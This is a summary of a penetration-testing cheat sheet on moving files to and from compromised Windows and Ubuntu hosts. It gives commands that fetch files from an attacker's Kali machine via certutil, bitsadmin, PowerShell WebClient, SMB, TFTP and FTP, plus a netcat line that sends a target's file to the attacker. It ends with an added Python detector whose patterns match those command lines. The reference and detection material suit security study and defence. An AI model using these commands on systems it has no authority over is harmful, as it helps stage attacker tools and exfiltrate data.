FILE TRANSFER CHEAT SHEET

The document titled “File Transfer Cheat Sheet” provides a comprehensive overview of various methods for transferring files in post-exploitation scenarios, particularly for penetration testing and red team activities. It covers multiple techniques using different tools and protocols, all focused on moving files between systems securely and efficiently. Here’s an extensive summary:

Overview

File transfer is a critical aspect of post-exploitation during penetration testing or red teaming. The document outlines numerous methods to transfer files from an attacker’s machine to a compromised target, providing a detailed step-by-step guide for each tool and protocol. The key methods include using wget, curl, certutil, bitsadmin, PowerShell, SMB server, SCP, TFTP, and FTP.

The setup assumes that the attacker has already gained shell access to the target machine, with examples using both Windows and Linux systems. The attacker’s machine is Kali Linux, while the targets are Windows 10 and Ubuntu systems.

Key File Transfer Methods

1. Wget

Wget is a simple and effective command-line tool to download files from the web. In a Windows environment, it requires specifying the -o flag to save the file, ensuring that the file is downloaded to the correct directory. For example:

powershell wget http://192.168.31.141/ignite.txt -o ignite.txt

2. Curl

Curl, like Wget, is another powerful command-line tool for transferring files using various network protocols. The command to download a file using Curl is:

curl http://192.168.31.141/ignite.txt -o ignite.txt

3. Certutil

Certutil is a Windows utility primarily used for certificate management but can also be leveraged for file transfers. It can handle large file transfers by splitting files into segments:

certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt

4. Bitsadmin

Bitsadmin is a Windows command-line tool designed for managing Background Intelligent Transfer Service (BITS) jobs. It can facilitate reliable file downloads even over unstable connections:

bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\Public\ignite.txt

5. PowerShell

PowerShell can be used directly to download files by invoking the System.Net.WebClient class. A simple command to download a file would be:

powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.31.141/ignite.txt', 'ignite.txt')

6. SMB Server

SMB (Server Message Block) is a protocol used for sharing files over a network. This method utilizes the impacket-smbserver tool to share directories between the attacker’s and target machines:

impacket-smbserver share $(pwd) -smb2support
copy \\192.168.31.141\share\ignite.txt

7. SCP (Secure Copy Protocol)

SCP is a secure protocol based on SSH that allows for the transfer of files between systems. It is widely used across both Linux and Windows platforms:

scp ignite.txt kali@192.168.31.141:/tmp
scp ignite.txt raj@192.168.31.219:/C:/Temp

8. TFTP (Trivial File Transfer Protocol)

TFTP is a simplified file transfer protocol that operates over UDP, making it lightweight but lacking the reliability features of TCP-based protocols. It’s commonly used in network booting and embedded systems:

tftp -i 192.168.31.219 GET ignite.txt

9. FTP (File Transfer Protocol)

FTP is a well-established protocol for file transfer. This document describes setting up an FTP server using Metasploit or Python’s pyftpdlib:

use auxiliary/server/ftp
ftp 192.168.31.141
get ignite.txt

Server Setup for File Transfer

In addition to file transfer methods, the document provides instructions for setting up various types of servers to facilitate file transfers, including:

  • Updog: A lightweight HTTP server, replacement for Python’s SimpleHTTPServer.
  • PHP: Using the built-in PHP web server.
  • Python2/3: Running simple HTTP servers using Python’s built-in modules.

Commands to set up servers are as follows:

  • Python3 HTTP Server:
    python3 -m http.server 8000
  • PHP Server:
    php -S 0.0.0.0:8081

File Transfer Using Netcat

Netcat (nc) is a versatile tool for establishing simple client-server setups for file transfer. The document describes both sending and receiving files using Netcat between Linux and Windows machines:

  • To send a file from Ubuntu to Kali:
    nc 192.168.31.141 5555 < file.txt
  • To receive the file on Kali:
    nc -lvp 5555 > file.txt
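
From the monitoring side, the commands listed above leave recognisable process command lines. The following is an added example, not part of the original cheat sheet: the rule names, the event layout and the sample events are constructed for illustration. It matches those command lines in process-creation logs and extracts the remote endpoint for pivoting.

```python
import re

IP = r"(?:\d{1,3}\.){3}\d{1,3}"
# (label, pattern) pairs keyed to the transfer commands shown on this page.
RULES = [(name, re.compile(rx, re.I)) for name, rx in [
    ("certutil-urlcache",    r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://"),
    ("bitsadmin-transfer",   r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://"),
    ("powershell-webclient", r"net\.webclient\)?\.downloadfile\s*\("),
    ("powershell-wget",      r"\bpowershell(\.exe)?\b.*\b(wget|iwr|invoke-webrequest)\b.*https?://"),
    ("curl-to-file",         r"\bcurl(\.exe)?\b(?=.*https?://)(?=.*\s(-o|--output)\s)"),
    ("tftp-get",             r"\btftp(\.exe)?\b.*\s-i\s+\S+\s+get\b"),
    ("copy-from-ip-unc",     r"\bcopy\s+\\\\" + IP + r"\\"),
    ("netcat-to-ip",         r"\b(nc|ncat|netcat)\s+" + IP + r"\s+\d+"),
]]
# Remote endpoint: URL host, UNC host given as an IP, or a bare IP argument.
REMOTE = re.compile(r"https?://([^/\s'\"]+)|\\\\(" + IP + r")\\|(?<![\w.])(" + IP + r")(?![\w.])")

def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def remote_host(cmdline):
    """Return the first remote endpoint named on the command line, or None."""
    m = REMOTE.search(cmdline)
    return next((g for g in m.groups() if g), None) if m else None

def triage(events):
    """Return (host, labels, remote) for each event matching at least one rule."""
    hits = []
    for host, cmdline in events:
        labels = classify(cmdline)
        if labels:
            hits.append((host, labels, remote_host(cmdline)))
    return hits

# Constructed (host, command line) events, not real telemetry.
# Shell redirections such as "< file.txt" never reach the process argv, so they are absent.
SAMPLE = [
    ("WIN10", r"certutil -urlcache -f http://192.168.31.141/ignite.txt ignite.txt"),
    ("WIN10", r"certutil -hashfile C:\Users\Public\ignite.txt SHA256"),
    ("WIN10", r"bitsadmin /transfer job http://192.168.31.141/ignite.txt C:\Users\Public\ignite.txt"),
    ("WIN10", r"copy \\192.168.31.141\share\ignite.txt"),
    ("ubuntu", "nc 192.168.31.141 5555"),
    ("ubuntu", "curl --version"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
```

The benign `certutil -hashfile` and `curl --version` lines are deliberately left unmatched; in production the patterns would be tuned against the environment's own baseline.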

Conclusion

The document concludes by summarizing the various tools available for file transfers during penetration testing. It emphasizes that the choice of tool depends on the specific situation and requirements, highlighting the need for flexibility in selecting the right approach for each scenario.

Overall, this cheat sheet serves as a valuable reference for security professionals engaged in post-exploitation activities, offering practical examples and commands for transferring files between compromised machines.
